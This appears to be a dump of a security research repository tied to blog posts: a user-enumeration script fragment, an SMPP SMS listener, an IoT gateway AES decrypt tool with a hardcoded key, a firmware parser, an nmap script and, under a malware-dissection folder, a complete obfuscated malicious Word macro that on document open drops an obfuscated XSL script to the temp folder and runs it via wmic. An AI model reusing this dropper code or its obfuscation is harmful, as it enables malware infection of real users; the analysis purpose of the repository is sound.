information still can be found in the saved users.xml file 92 | root = ET.parse('./users.xml').getroot() 93 | count=0 94 | ind=1 95 | while ind: 96 | try: 97 | ind=root[0][0][0][0][0][1][0][0][count][0][0][1][0][2][1].text 98 | except IndexError: 99 | pass 100 | break 101 | count+=1 102 | 103 | print "Number of users found: " + str(count) + "\n" 104 | 105 | for i in range(0,count): 106 | print "User " + str(i) + ": " + root[0][0][0][0][0][1][0][0][i][0][0][1][0][2][1].text + "\n........................" 107 | print "home directory:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][0][0][1][1][0][1][1].text 108 | print "uid:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][11][0][1][1][0][1][1][0].text 109 | print "gid:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][3][0][1][1][0][1][1][0].text 110 | print "primaryGroupName:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][4][0][1][1][0][1][1].text 111 | try: 112 | print "username:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][2][0][1][1][0][1][1].text 113 | except IndexError: 114 | pass 115 | try: 116 | print "shell:" + root[0][0][0][0][0][1][0][0][i][0][1][1][0][2][1][0][0][10][0][1][1][0][1][1].text 117 | except IndexError: 118 | pass 119 | print "........................\n" 120 | 121 | 122 | wrappedSocket.close() 123 | -------------------------------------------------------------------------------- /gsm_troopers/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2017/03/troopers17-gsm-network-how-about-your-own-smpp-service/ 2 | -------------------------------------------------------------------------------- /gsm_troopers/smpp_example_listener.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import logging 3 | import sys 4 | 5 | import smpplib.gsm 6 | import smpplib.client 7 | import smpplib.consts 8 | 9 | 
############################################################################
# EXAMPLE SCRIPT FOR TROOPERS 2017 SMPP LISTENER                           #
# www.troopers.de                                                          #
# FOR QUESTIONS, PLS Contact Hendrik Schmidt, hschmidt@ernw.de             #
############################################################################
# Minimal SMPP ESME: binds as transceiver to a local SMSC, logs every
# inbound SMS and echoes it back to the sender.  Python 2 (print
# statement below).

_MYSERVICE="20001" #functional number of your service

#Enable Logging
# NOTE(review): DEBUG level, and the handler below logs full message
# bodies and sender numbers, so YourESME.log accumulates subscriber data;
# restrict its permissions or lower the level outside the demo.
logging.basicConfig(filename="YourESME.log",level='DEBUG')

#YOUR CODE
def handle_incoming_sms(pdu):
    """Handle one received PDU: log it, then echo the text back to the sender.

    `pdu.source_addr`, `pdu.destination_addr` and `pdu.short_message` are
    subscriber-controlled input.  The concatenation assumes they are str;
    depending on the smpplib version they may be bytes -- verify.
    The reply goes to `pdu.source_addr`, so a peer that itself
    auto-replies produces an unbounded message loop; there is no rate
    limit or de-duplication (example code).  Returns None.
    """
    logging.info(pdu.source_addr + " -> " + pdu.destination_addr + " send msg " + pdu.short_message)
    #YOUR CODE
    #...
    #...
    # Send SMS Back
    send_message(_MYSERVICE,pdu.source_addr,"Successfully received SMS with content " + pdu.short_message)



#######################
def send_message(src,dest, string):
    """Send `string` from `src` to `dest`, split into parts by smpplib.gsm.make_parts().

    Each part is submitted via the module-level `client` (created below,
    so this must only run after the bind) with international TON / ISDN
    NPI on both addresses and no delivery receipt requested.  The PDU
    returned by client.send_message() is discarded.  Returns None.
    """
    parts, encoding_flag, msg_type_flag = smpplib.gsm.make_parts(string)

    logging.info('Sending SMS "%s" to %s' % (string, dest))
    for part in parts:
        pdu = client.send_message(
            source_addr_ton=smpplib.consts.SMPP_TON_INTL,
            source_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            source_addr=src,
            dest_addr_ton=smpplib.consts.SMPP_TON_INTL,
            dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            destination_addr=dest,
            short_message=part,
            data_coding=encoding_flag,
            esm_class=msg_type_flag,
            registered_delivery=False,
        )


# Plain TCP to the SMSC.  SMPP carries no transport security of its own,
# so the bind credentials and all traffic are cleartext on the wire --
# fine on loopback as configured here.
client = smpplib.client.Client('127.0.0.1', 2775)

# Print Output and Start Handler
client.set_message_sent_handler(
    lambda pdu: logging.info('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))
client.set_message_received_handler(handle_incoming_sms)

client.connect()

# NOTE(review): placeholder credentials hard-coded in source; read
# system_id/password from the environment or a config file kept out of
# the repository before pointing this at a real SMSC.
client.bind_transceiver(system_id='YourESME', password='123456')
print "MYSERVICE: Successfully bound SMPP"



# Receive loop: listen() blocks; a normal return ends the loop, Ctrl-C
# ends it too, and any other exception is logged and listen() is retried
# (the remaining except clauses follow this block).
while True:
    try:
        client.listen()
        break
    except KeyboardInterrupt:
break 71 | except Exception as e: 72 | logging.exception('Error during listen' + str(e)) 73 | 74 | -------------------------------------------------------------------------------- /malware_dissection_part2/aubR9KfZ.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 0) 13 | { 14 | var a1Try = true; 15 | var aDNoMfPC = false; 16 | var ai4epbE = "aWudtj"; 17 | var a52l6tnX = ai4epbE.toString(); 18 | var aaedRFNVW = true; 19 | return(aj0Dbl8E.replace(/3v4d6tka/g, "")); 20 | } 21 | } 22 | var a7YOdJzy = true; 23 | var arnYX2 = -41643; 24 | function aCxlZF(am4pzC9) 25 | { 26 | var aQGVjc = "a46Qhyfn"; 27 | var aTsLh = aQGVjc.toString(); 28 | ajnpz = "aR5LxisY2"; 29 | aLgSnO4y = ajnpz.toUpperCase(); 30 | var ahYfg = [ 31 | x("a3v4d6tkad3v4d6tkao3v4d6tkad3v4d6tkab3v4d6tka.3v4d6tkas3v4d6tkat3v4d6tkar3v4d6tkae3v4d6tkaa3v4d6tkam3v4d6tka", "aAK6it0ub"), 32 | x("w3v4d6tkas3v4d6tkac3v4d6tkar3v4d6tkai3v4d6tkap3v4d6tkat3v4d6tka.3v4d6tkas3v4d6tkah3v4d6tkae3v4d6tkal3v4d6tkal3v4d6tka", "a5TuwIY"), 33 | x("s3v4d6tkac3v4d6tkar3v4d6tkai3v4d6tkap3v4d6tkat3v4d6tkai3v4d6tkan3v4d6tkag3v4d6tka.3v4d6tkaf3v4d6tkai3v4d6tkal3v4d6tkae3v4d6tkas3v4d6tkay3v4d6tkas3v4d6tkat3v4d6tkae3v4d6tkam3v4d6tkao3v4d6tkab3v4d6tkaj3v4d6tkae3v4d6tkac3v4d6tkat3v4d6tka", "azoReTfU"), 34 | x("m3v4d6tkas3v4d6tkax3v4d6tkam3v4d6tkal3v4d6tka23v4d6tka.3v4d6tkax3v4d6tkam3v4d6tkal3v4d6tkah3v4d6tkat3v4d6tkat3v4d6tkap3v4d6tka", "aHmkpSJ"), 35 | x("s3v4d6tkaa3v4d6tkav3v4d6tkae3v4d6tkat3v4d6tkao3v4d6tkaf3v4d6tkai3v4d6tkal3v4d6tkae3v4d6tka", "aNSm4G"), 36 | x("r3v4d6tkau3v4d6tkan3v4d6tka", "aXT10"), 37 | x("d3v4d6tkae3v4d6tkal3v4d6tkae3v4d6tkat3v4d6tkae3v4d6tkaf3v4d6tkai3v4d6tkal3v4d6tkae3v4d6tka", "aoaLU"), 38 | x("a3v4d6tka43v4d6tkah3v4d6tkaA3v4d6tkae3v4d6tka83v4d6tkaO3v4d6tkaq3v4d6tka63v4d6tka.3v4d6tkae3v4d6tkax3v4d6tkae3v4d6tka", "ac6zDZu"), 39 | ]; 40 | aF80xmdpO = -59218; 41 | var ajuEMatk = "ayxX7VWP"; 42 | aVD0TbrJZ = ajuEMatk.toUpperCase(); 43 | ahoxHwE06 = -41543; 44 | 
var argnhxP = false; 45 | return(ahYfg[am4pzC9]); 46 | } 47 | arC4e1hRf = -30386; 48 | a5rKTn = -3556; 49 | function aD70avG3i(a6Z8FODg) 50 | { 51 | ahTf3R = -60844; 52 | aF49eS = true; 53 | aGabP6 = "a9xQi"; 54 | aIHly8jD = aGabP6.toLowerCase(); 55 | return new ActiveXObject(a6Z8FODg); 56 | } 57 | var aWbE8V = aD70avG3i(x("w3v4d6tkas3v4d6tkac3v4d6tkar3v4d6tkai3v4d6tkap3v4d6tkat3v4d6tka.3v4d6tkas3v4d6tkah3v4d6tkae3v4d6tkal3v4d6tkal3v4d6tka", "a5TuwIY")).expandenvironmentstrings(x("%3v4d6tkat3v4d6tkae3v4d6tkam3v4d6tkap3v4d6tka%3v4d6tka", "a2QNbTtn")) + "\\"; 58 | ]]> 59 | 60 | 61 | 63 | 64 | 65 | 117 | 118 | 119 | 120 | 121 | 122 | -------------------------------------------------------------------------------- /malware_dissection_part2/macro.vbs: -------------------------------------------------------------------------------- 1 | Attribute VB_Name = "ThisDocument" 2 | Attribute VB_Base = "1Normal.ThisDocument" 3 | Attribute VB_GlobalNameSpace = False 4 | Attribute VB_Creatable = False 5 | Attribute VB_PredeclaredId = True 6 | Attribute VB_Exposed = True 7 | Attribute VB_TemplateDerived = True 8 | Attribute VB_Customizable = True 9 | Sub Document_Open() 10 | Dim auyhPXig 11 | auyhPXig = Hex(79) 12 | ' Untoward puppy flurry contrast 13 | If afu3icSU = False Then 14 | afu3icSU = True 15 | Else 16 | afu3icSU = False 17 | End If 18 | ' 19 | Dim aJ54M 20 | For aJ54M = 10 To 45 21 | Debug.Print Error(aJ54M) 22 | Next aJ54M 23 | ' Fx trailers 24 | If abu79 = False Then 25 | abu79 = True 26 | Else 27 | abu79 = False 28 | End If 29 | ' Gardening 30 | If ajB29FgVm = False Then 31 | ajB29FgVm = True 32 | Else 33 | ajB29FgVm = False 34 | End If 35 | Dim alFXpTfQv 36 | alFXpTfQv = Fix(4) 37 | ' Promo ian 38 | Dim acXfzP 39 | acXfzP = Hex(168) 40 | If akg1VNf = False Then 41 | akg1VNf = True 42 | Else 43 | akg1VNf = False 44 | End If 45 | ' Astern 46 | main 47 | End Sub 48 | Attribute VB_Name = "aBK3We20" 49 | Function aiAxazbj(aMtY57d, aYSXG) 50 | ' 51 | aiAxazbj = Chr("&h" & 
Mid(aMtY57d, aYSXG, 2)) 52 | End Function 53 | Function aMhXE6(aMtY57d) 54 | Dim agn1f9EH7 55 | agn1f9EH7 = Fix(6) 56 | Dim ahNObAaz7 57 | ahNObAaz7 = Fix(12) 58 | ' Unlikely 59 | Dim aCBns3L 60 | aCBns3L = Exp(5) 61 | ' Uphold trophy 62 | Dim a7FgQ 63 | For a7FgQ = 20 To 38 64 | Debug.Print Error(a7FgQ) 65 | Next a7FgQ 66 | ' Delaware baptismal 67 | azBoku = Not (azBoku) 68 | ' Accordant begone jul indolence speakers 69 | Dim aRvQc 70 | aRvQc = Abs(48) 71 | ' Millions leprous 72 | If aspa9fdV = False Then 73 | aspa9fdV = True 74 | Else 75 | aspa9fdV = False 76 | End If 77 | ' Analysts congratulations tillage 78 | Dim aGUTbZXW 79 | aGUTbZXW = Hex(203) 80 | ' Frisky parent schema scabbard 81 | If a0dIrRQuh = False Then 82 | a0dIrRQuh = True 83 | Else 84 | a0dIrRQuh = False 85 | End If 86 | ' Portend weight activists 87 | Dim aLmQdk6xc 88 | aLmQdk6xc = Hex(237) 89 | For aYSXG = 1 To Len(aMtY57d) Step 2 90 | ' 91 | aGdmsa = aGdmsa & aiAxazbj(aMtY57d, aYSXG) 92 | Next aYSXG 93 | ' 94 | aMhXE6 = aGdmsa 95 | End Function 96 | Attribute VB_Name = "aMvcKzRn9" 97 | Public Sub aWK1i(aQxXU As String, aVK8ef As String) 98 | Dim axFdHm As Object 99 | Set axFdHm = CreateObject("Scripting.FileSystemObject") 100 | Dim a9ztifG As Object 101 | Set a9ztifG = axFdHm.CreateTextFile(Environ(aVK8ef) & "\aubR9KfZ.xs" & ahSs9Ate(), True, True) 102 | a9ztifG.Write aQxXU 103 | a9ztifG.Close 104 | Dim aTHgxnsl 105 | aTHgxnsl = Exp(5) 106 | ' Niger periodic chance ado 107 | Dim ahCefrIE 108 | For ahCefrIE = 28 To 56 109 | Debug.Print Error(ahCefrIE) 110 | Next ahCefrIE 111 | ' Inspired 112 | Dim aXTU9N 113 | aXTU9N = Abs(62) 114 | ' Nature stagger 115 | a4LfFot = Not (a4LfFot) 116 | ' Uplifting riley adept 117 | Dim atuqEx 118 | atuqEx = Abs(-61) 119 | ' Infatuation bonds factor 120 | Dim aYytjDO 121 | aYytjDO = Abs(28) 122 | ' Incredible stoic remoteness 123 | Dim am5b2p 124 | am5b2p = Abs(-55) 125 | aKCTh73 = IsNull(alXL5) 126 | ' Ty 127 | If akhgeW = False Then 128 | akhgeW = True 129 | 
Else 130 | akhgeW = False 131 | End If 132 | ' Everywhere keywords bahamas churches strong builds 133 | If aHe9Zx7 = False Then 134 | aHe9Zx7 = True 135 | Else 136 | aHe9Zx7 = False 137 | End If 138 | Dim axj4Pq 139 | axj4Pq = Hex(207) 140 | ' Choice cumulative photo 141 | Dim arYcf 142 | arYcf = Fix(15) 143 | ' Almighty rain printer satirical attica 144 | Dim abWhz 145 | abWhz = Exp(9) 146 | ' Fake isabelle 147 | If aqTL0zAdi = False Then 148 | aqTL0zAdi = True 149 | Else 150 | aqTL0zAdi = False 151 | End If 152 | ' African itinerant divorced coitus 153 | Dim aDhS6 154 | aDhS6 = Abs(-11) 155 | ' Lung transform repairs tendril jelsoft 156 | Dim akQKD9hCd 157 | akQKD9hCd = Abs(-38) 158 | Dim asSyYe 159 | asSyYe = Hex(158) 160 | Dim a9ZcjiB 161 | For a9ZcjiB = 12 To 46 162 | Debug.Print Error(a9ZcjiB) 163 | Next a9ZcjiB 164 | ' Constituent singing 165 | Dim abksjm 166 | For abksjm = 20 To 62 167 | Debug.Print Error(abksjm) 168 | Next abksjm 169 | ' Commune broom academic footstep 170 | Dim apK2UtDf 171 | For apK2UtDf = 4 To 55 172 | Debug.Print Error(apK2UtDf) 173 | Next apK2UtDf 174 | ' Sedan killing ref 175 | Dim ayRKG4 176 | ayRKG4 = Hex(167) 177 | ' Thirty-nine 178 | End Sub 179 | Function a1RS3() 180 | aTzaXyeF4 = IsNull(a5sy3reEO) 181 | ' Middling answered breezy collector 182 | Dim anofe9 183 | anofe9 = Exp(5) 184 | Dim agj8x1ALa 185 | agj8x1ALa = Abs(-18) 186 | If aNy0LA = False Then 187 | aNy0LA = True 188 | Else 189 | aNy0LA = False 190 | End If 191 | ' Differential christ affluent coy cj 192 | Dim a6EUxlPf 193 | a6EUxlPf = Hex(67) 194 | ' Accuses 195 | Dim aBZCSm0h 196 | aBZCSm0h = Hex(197) 197 | ' Vituperation placed downloading smoke 198 | Dim ahj5PxFrq 199 | ahj5PxFrq = Hex(206) 200 | ' Washer whod 201 | Dim aBZuYRE 202 | aBZuYRE = Fix(16) 203 | ' Northamptonshire 204 | afu4q = IsNull(agF10BMcs) 205 | ' Demonstrates cartridge lath routing daniel gamespot 206 | Dim alWrn6KA 207 | alWrn6KA = Fix(13) 208 | ' Generator slighting big zope rewards dubai 209 | 
If awzpB0g = False Then 210 | awzpB0g = True 211 | Else 212 | awzpB0g = False 213 | End If 214 | ' Forge accessed 215 | Dim aLEHYqUrc 216 | aLEHYqUrc = Fix(1) 217 | agqL9UJ = Not (agqL9UJ) 218 | aC7HoW = Not (aC7HoW) 219 | Dim a6OZPj 220 | a6OZPj = Exp(3) 221 | a6wNfzX3W = IsNull(atKE2) 222 | Dim aGMN5qXuj 223 | aGMN5qXuj = Fix(15) 224 | ' Olive exceptional jap pent-up 225 | Dim apI8F5sj 226 | apI8F5sj = Exp(16) 227 | ' Assignment abstaining acclaim 228 | Dim aUC85vPh 229 | aUC85vPh = Abs(64) 230 | Dim ax7hoNB5 231 | ax7hoNB5 = Fix(15) 232 | Dim aK3Urma8Q 233 | aK3Urma8Q = Exp(5) 234 | Set aEJydG = New aLeIgcA9T 235 | Dim aUByLx 236 | For aUByLx = 18 To 35 237 | Debug.Print Error(aUByLx) 238 | Next aUByLx 239 | Dim aDEOplrK1 240 | For aDEOplrK1 = 13 To 35 241 | Debug.Print Error(aDEOplrK1) 242 | Next aDEOplrK1 243 | aEWYKaeu = aEJydG.sh.Text 244 | Dim a2W0zqDv 245 | a2W0zqDv = Hex(62) 246 | ' Welch conditional apathy dee 247 | Dim axDehb 248 | For axDehb = 25 To 53 249 | Debug.Print Error(axDehb) 250 | Next axDehb 251 | ' Mississippi 252 | If a1KPb4M = False Then 253 | a1KPb4M = True 254 | Else 255 | a1KPb4M = False 256 | End If 257 | ' Receivers rocky apart oil 258 | aEkbYD4 = aEJydG.cd.Text 259 | If afGa6 = False Then 260 | afGa6 = True 261 | Else 262 | afGa6 = False 263 | End If 264 | ' Suggestion tandem garnered 265 | Dim aXFVf 266 | aXFVf = Abs(-56) 267 | ' Penis gm 268 | a1RS3 = aMhXE6(aEWYKaeu & aEkbYD4) 269 | End Function 270 | Function ahSs9Ate() 271 | Dim aXp0m6WOr 272 | aXp0m6WOr = Abs(-11) 273 | aCEGNa7 = IsNull(ard3ijnC) 274 | ' Arrives judicature 275 | ahSs9Ate = "l" 276 | End Function 277 | Function aZUnok(ByRef az4wI As String) 278 | Const asXoV4Jm = 97 279 | Const aL4pqSUyQ = 26 280 | Const al0BfU = 65 281 | Const kRotRange = aL4pqSUyQ / 2 282 | Dim advce As Long 283 | Dim adpWEY5HM As String 284 | If Len(az4wI) > 0 Then 285 | For i = 1 To Len(az4wI) 286 | advce = 0 287 | c = Mid(az4wI, i, 1) 288 | cc = Asc(c) 289 | If cc >= asXoV4Jm And cc < 
(asXoV4Jm + aL4pqSUyQ) Then 290 | advce = asXoV4Jm 291 | ElseIf cc >= al0BfU And cc < (al0BfU + aL4pqSUyQ) Then 292 | advce = al0BfU 293 | End If 294 | 295 | If advce > 0 Then 296 | theRot13Code = (((cc - advce) + kRotRange) Mod aL4pqSUyQ) + advce 297 | theRot13Char = Chr(theRot13Code) 298 | adpWEY5HM = adpWEY5HM + theRot13Char 299 | 300 | Else 301 | adpWEY5HM = adpWEY5HM + c 302 | End If 303 | Next 304 | End If 305 | 306 | aZUnok = adpWEY5HM 307 | End Function 308 | Attribute VB_Name = "aWyoSkBVb" 309 | Sub main() 310 | Dim arcwb 311 | arcwb = Fix(4) 312 | ' Abstinence mistook counsel 313 | Dim aB1Q9 314 | aB1Q9 = Exp(7) 315 | Dim aPtS2y 316 | aPtS2y = Abs(1) 317 | Dim aUrH3 As String 318 | Dim afyQhuWr6 319 | afyQhuWr6 = Exp(5) 320 | ' Variability thumbs procures 321 | Dim a1udH 322 | For a1udH = 12 To 36 323 | Debug.Print Error(a1udH) 324 | Next a1udH 325 | ' Surely man-of-war offender 326 | If ayYNf4hl = False Then 327 | ayYNf4hl = True 328 | Else 329 | ayYNf4hl = False 330 | End If 331 | ' Eros adviser dampness 332 | ad5FK = Not (ad5FK) 333 | Dim a5G739v 334 | a5G739v = Exp(13) 335 | Dim aRtz03H 336 | For aRtz03H = 29 To 51 337 | Debug.Print Error(aRtz03H) 338 | Next aRtz03H 339 | aBmui = IsNull(ast092Nym) 340 | aUrH3 = aZUnok("776q69632070726s63657373206p697374202s666s726q61743n222574656q70255p61756252394o665n22") 341 | Dim awCdX 342 | awCdX = Exp(14) 343 | ' Thirtieth struct platinum forestall heartfelt excellence respiratory 344 | apGuvZmr2 = IsNull(ajsfX) 345 | aWK1i a1RS3(), "temp" 346 | Dim aqetAu 347 | For aqetAu = 20 To 63 348 | Debug.Print Error(aqetAu) 349 | Next aqetAu 350 | Dim aUR2AE 351 | aUR2AE = Fix(9) 352 | ' Horde weedy mach 353 | Dim aEUbge 354 | aEUbge = Abs(-59) 355 | ' Clothes revel 356 | Dim aMo5A 357 | aMo5A = Hex(68) 358 | ' Za theoretical getting info nourish warm 359 | Dim a7KMf85m9 360 | a7KMf85m9 = Abs(-37) 361 | ' Dane armenia sadden layman secretariat martial 362 | Dim any76 363 | any76 = Abs(-29) 364 | ' Worcester hearing 365 | 
Dim a8wUICGa 366 | a8wUICGa = Hex(40) 367 | Dim aICnZ4H1 368 | aICnZ4H1 = Exp(11) 369 | ' Mariah incentive surround jumps 370 | atep7aP = Not (atep7aP) 371 | ' Species ronald antibodies 372 | Dim aW47L 373 | aW47L = Abs(-32) 374 | ' Deadly protocol colon ease garage clayey 375 | Dim al7zhXY1 376 | al7zhXY1 = Exp(2) 377 | ' Competing adware katharine 378 | Set atubG = New WshShell 379 | ' 380 | aHUGo0f = aMhXE6(aUrH3) 381 | Dim a3VUf 382 | a3VUf = Exp(16) 383 | ' Tennis pulling job print 384 | Dim aelS2GqV 385 | For aelS2GqV = 32 To 46 386 | Debug.Print Error(aelS2GqV) 387 | Next aelS2GqV 388 | ' Goggles pegasus 389 | Dim aioZQ5Fj 390 | aioZQ5Fj = Fix(11) 391 | ' Representations offline 392 | Dim aI8KDBj2 393 | aI8KDBj2 = Fix(8) 394 | Call atubG.run(aHUGo0f, 2) 395 | aSbFzMV4 = Not (aSbFzMV4) 396 | ' Fed an rfc cricket conservative 397 | Dim a7fi9Lo 398 | a7fi9Lo = Abs(55) 399 | ' Misleading opened acrobat milf 400 | If aOhHpA1 = False Then 401 | aOhHpA1 = True 402 | Else 403 | aOhHpA1 = False 404 | End If 405 | ' Inflation airlines exceptions 406 | Dim ajuKHV 407 | ajuKHV = Hex(188) 408 | ' Untold inquisitor 409 | Dim a6tpwczIQ 410 | a6tpwczIQ = Hex(195) 411 | ' Seasoning badge actors negotiate 412 | Dim a98Oa3P1f 413 | a98Oa3P1f = Exp(9) 414 | ' Walt spout sans 415 | acHjv = Not (acHjv) 416 | ' Notifications diver torpedoes maynt starter mutation 417 | 418 | If ajD42eZL = False Then 419 | ajD42eZL = True 420 | Else 421 | ajD42eZL = False 422 | End If 423 | ' Hie tracker sediment 424 | Dim aQSD3nF 425 | aQSD3nF = Fix(6) 426 | ' Cherubs porphyry bunny versions ideas 427 | Dim aVRHbx 428 | aVRHbx = Hex(128) 429 | ' Genuine extreme stanford 430 | aQ8vS = IsNull(at65yj1Aw) 431 | ' Modern loki viper ensnare guild 432 | Dim azHWhqD 433 | azHWhqD = Hex(1) 434 | ' Lanka influenza disorder starts pillage 435 | End Sub 436 | Attribute VB_Name = "aLeIgcA9T" 437 | Attribute VB_Base = "0{54855455-CBA9-4145-80AF-68D8FFB0E356}{FCB0EE51-99E4-4BF1-9F7C-42E27E9CC73A}" 438 | 
Attribute VB_GlobalNameSpace = False 439 | Attribute VB_Creatable = False 440 | Attribute VB_PredeclaredId = True 441 | Attribute VB_Exposed = False 442 | Attribute VB_TemplateDerived = False 443 | Attribute VB_Customizable = False 444 | Private Sub UserForm_Initialize() 445 | Dim aVYqi3A 446 | For aVYqi3A = 9 To 51 447 | Debug.Print Error(aVYqi3A) 448 | Next aVYqi3A 449 | ' Moses vans privilege gnu lodges 450 | aQhaZ3 = Not (aQhaZ3) 451 | Dim aUhXxyF 452 | aUhXxyF = Exp(7) 453 | Dim acz21l 454 | acz21l = Fix(13) 455 | End Sub 456 | -------------------------------------------------------------------------------- /maxcube/README.md: -------------------------------------------------------------------------------- 1 | Blog post: https://insinuator.net/2016/04/discover-the-unknown-analyzing-an-iot-device/ 2 | -------------------------------------------------------------------------------- /maxcube/decrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import sys 3 | import binascii 4 | import base64 5 | from Crypto.Cipher import AES 6 | 7 | KEY = '7815696ecbf1c96e6894b779456d330e' 8 | IV = '\x36\x8a\xea\x76\x12\xc9\xab\x91\x63\xda\xea\x76\x12\xc9\xac\x93' 9 | 10 | 11 | class MaxCubeCrypto: 12 | MODE = AES.MODE_CBC 13 | BLOCK_SIZE = 16 14 | 15 | def encrypt(self, ptext): 16 | aes = AES.new(binascii.unhexlify(KEY), self.MODE, IV=IV) 17 | return aes.encrypt(self.pad(ptext)) 18 | 19 | 20 | def decrypt(self, ctext): 21 | aes = AES.new(binascii.unhexlify(KEY), self.MODE, IV=IV) 22 | return self.unpad(aes.decrypt(ctext)) 23 | 24 | 25 | def pad(self,s) 26 | return s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) 27 | 28 | 29 | def unpad(self,s): 30 | return s[0:-ord(s[-1])] 31 | 32 | 33 | if __name__ == '__main__': 34 | 35 | if len(sys.argv) != 3: 36 | print('{} [enc|dec] input'.format(sys.argv[0])) 37 | sys.exit(1) 38 | 39 | maxcube = MaxCubeCrypto() 40 | 41 
| if sys.argv[1] == 'enc': 42 | ret = maxcube.encrypt(sys.argv[2]) 43 | sys.stdout.write(base64.b64encode(ret)) 44 | 45 | elif sys.argv[1] == 'dec': 46 | data = base64.b64decode(sys.argv[2]) 47 | ret = maxcube.decrypt(data) 48 | sys.stdout.write(ret) 49 | 50 | else: 51 | print('Invalid command: {}'.format(sys.argv[1])) 52 | -------------------------------------------------------------------------------- /maxcube/firmware/parser/FirmwareFile.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.io.ByteArrayOutputStream; 3 | import java.io.IOException; 4 | import java.io.InputStream; 5 | import java.util.LinkedList; 6 | import java.util.List; 7 | 8 | public class FirmwareFile { 9 | private final List frames = new LinkedList(); 10 | 11 | public FirmwareFile(InputStream stream) throws IOException { 12 | this.parse(stream); 13 | } 14 | 15 | public List getFrames() { 16 | return this.frames; 17 | } 18 | 19 | private void parse(InputStream stream) throws IOException { 20 | try { 21 | this.readFrames(stream); 22 | } catch (IOException var3) { 23 | } 24 | } 25 | 26 | private void readFrames(InputStream stream) throws IOException { 27 | this.frames.clear(); 28 | 29 | for(byte[] frame = this.readFrame(stream); frame != null; frame = this.readFrame(stream)) { 30 | this.frames.add(frame); 31 | } 32 | 33 | } 34 | 35 | private byte[] readFrame(InputStream stream) throws IOException { 36 | int length = this.readLength(stream); 37 | return length > 0?this.readFrameData(stream, length):null; 38 | } 39 | 40 | private int readLength(InputStream stream) throws IOException { 41 | int high = this.readByte(stream); 42 | int low = this.readByte(stream); 43 | return high << 8 | low; 44 | } 45 | 46 | private byte[] readFrameData(InputStream stream, int length) throws IOException { 47 | ByteArrayOutputStream outStream = new ByteArrayOutputStream(); 48 | 49 | for(int result = 0; result < length; ++result) { 50 | int value = 
this.readByte(stream); 51 | outStream.write(value); 52 | } 53 | 54 | byte[] var6 = outStream.toByteArray(); 55 | outStream.close(); 56 | return var6; 57 | } 58 | 59 | private int readByte(InputStream stream) throws IOException { 60 | int high = stream.read(); 61 | int low = stream.read(); 62 | return this.createByte(high, low); 63 | } 64 | 65 | private int createByte(int high, int low) { 66 | return this.fromHex(high) << 4 | this.fromHex(low); 67 | } 68 | 69 | private int fromHex(int value) { 70 | return 48 <= value && value <= 57?value - 48:(97 <= value && value <= 102?value - 97 + 10:(65 <= value && value <= 70?value - 65 + 10:0)); 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /maxcube/firmware/parser/FirmwareParser.java: -------------------------------------------------------------------------------- 1 | import java.io.*; 2 | import java.util.List; 3 | import java.nio.file.*; 4 | 5 | public class FirmwareParser { 6 | public static void main(String[] args) throws IOException { 7 | if(args.length != 2){ 8 | System.out.println("Need a source and a destination file path"); 9 | System.exit(0); 10 | } 11 | 12 | InputStream stream = new FileInputStream(args[0]); 13 | FirmwareFile firmwareFile = new FirmwareFile(stream); 14 | List frames = firmwareFile.getFrames(); 15 | Path path = Paths.get(args[1]); 16 | 17 | for(byte[] b: frames){ 18 | Files.write(path, b, StandardOpenOption.CREATE, StandardOpenOption.APPEND); 19 | } 20 | 21 | System.out.println("Finished"); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /maxcube/maxcube-info.nse: -------------------------------------------------------------------------------- 1 | local shortport = require "shortport" 2 | local stdnse = require "stdnse" 3 | 4 | description = [[ 5 | Get basic information from a eQ-3 MAX! Cube LAN Gateway. 
6 | 7 | Product info: 8 | http://www.eq-3.de/produkte/max-heizungssteuerung/max-hausloesung/bc-lgw-o-tw.html 9 | ]] 10 | 11 | --- 12 | -- @output 13 | -- PORT STATE SERVICE 14 | -- 62910/tcp open unknown 15 | -- | maxcube-info: 16 | -- | MAX Serial:: KMD1016788 17 | -- | RF Address: 099c3e 18 | -- |_ Firmware Version: 0113 19 | -- 20 | 21 | author = "Niklaus Schiess " 22 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 23 | categories = {"discovery", "safe"} 24 | portrule = shortport.portnumber(62910, "tcp") 25 | 26 | action = function(host, port) 27 | -- Wait for some time to make sure there is no open TCP connection. 28 | stdnse.sleep(1) 29 | 30 | local sock = nmap.new_socket() 31 | local status, err = sock:connect(host, port, "tcp") 32 | 33 | if not status then 34 | stdnse.debug1("%s", err) 35 | return 36 | end 37 | 38 | local status, data = sock:receive() 39 | 40 | if not status or not data then 41 | stdnse.debug1("%s", "Could not receive any data") 42 | return 43 | end 44 | 45 | local output = stdnse.output_table() 46 | local serial, rf_address, firmware 47 | 48 | for serial,rf_address,firmware in data:gmatch("H:(%u%u%u%d%d%d%d%d%d%d),(%x%x%x%x%x%x),(%d%d%d%d),") do 49 | output["MAX Serial:"] = serial 50 | output["RF Address"] = rf_address 51 | output["Firmware Version"] = firmware 52 | end 53 | 54 | return output 55 | end 56 | -------------------------------------------------------------------------------- /netmon_troopers/README.md: -------------------------------------------------------------------------------- 1 | # Troopers Netmon # 2 | 3 | ### Includes 4 | Troopers16 netmon: 5 | * Configuration files for Grafana, Influxdb, collectd 6 | * Dashboard for Grafana 7 | * "Magic" scripts 8 | 9 | Blog post: https://insinuator.net/2016/03/troopers-netmon/ 10 | -------------------------------------------------------------------------------- /netmon_troopers/collectd.conf: 
